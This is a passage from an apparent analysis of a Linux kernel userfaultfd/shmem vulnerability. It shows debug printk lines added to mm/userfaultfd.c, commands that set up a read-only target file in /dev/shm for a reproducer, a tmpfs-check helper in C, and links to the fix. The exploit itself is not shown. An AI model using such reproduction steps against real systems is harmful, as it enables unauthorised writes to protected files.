+ _dst_pte = pte_mkdirty(_dst_pte);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[mfill_atomic_install_pte/%s] pte_mkdirty(page=0x%lx) (pte: 0x%lx)\n", current->comm, (unsigned long)page, pte_val(_dst_pte));}
if (page_in_cache && !vm_shared)
writable = false;
@@ -246,7 +246,7 @@ static int mcontinue_atomic_pte(struct mm_struct *dst_mm,
struct page *page;
int ret;
- ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC);
+ ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[mcontinue_atomic_pte/%s] shmem_getpage returns page: 0x%lx\n", current->comm, (unsigned long)page);}
/* Our caller expects us to return -EFAULT if we failed to find page. */
if (ret == -ENOENT)
ret = -EFAULT;
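Before testing, prepare the target file as follows.
(David's reproducer uses /tmp/foo, but userfaultfd minor-fault registration only works on shmem (tmpfs) or hugetlbfs mappings. /tmp was not a tmpfs mount in this test setup, so userfaultfd registration failed; /dev/shm is tmpfs-backed.)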
sudo -s
echo "asdf" > /dev/shm/foo
chmod 0404 /dev/shm/foo
exit
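Whether a given directory is backed by shmem can be checked with statfs(2) by comparing `f_type` against TMPFS_MAGIC from <linux/magic.h>. This is a sketch assuming the target file lives on an ordinary tmpfs mount such as /dev/shm; the helper name `is_on_tmpfs` is hypothetical.

```c
#include <assert.h>
#include <linux/magic.h>
#include <sys/vfs.h>

/* Hypothetical helper: 1 if `path` is on tmpfs, 0 if not, -1 on error. */
static int is_on_tmpfs(const char *path)
{
    struct statfs st;

    if (statfs(path, &st) != 0)
        return -1;
    return st.f_type == TMPFS_MAGIC ? 1 : 0;
}
```

On typical distributions `is_on_tmpfs("/dev/shm")` is expected to return 1, while /tmp may or may not be tmpfs depending on the system.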
Running the PoC after this produces the following output.
references:
commit: https://github.com/torvalds/linux/commit/5535be3099717646781ce1540cf725965d680e7b
lore.kernel patch v1: https://lore.kernel.org/linux-mm/20220808073232.8808-1-david@redhat.com/#r
lore.kernel patch v2: https://lore.kernel.org/all/20220809205640.70916-1-david@redhat.com/T/#u
openwall: https://www.openwall.com/lists/oss-security/2022/08/08/1
openwall2: https://lists.openwall.net/linux-kernel/2022/08/08/418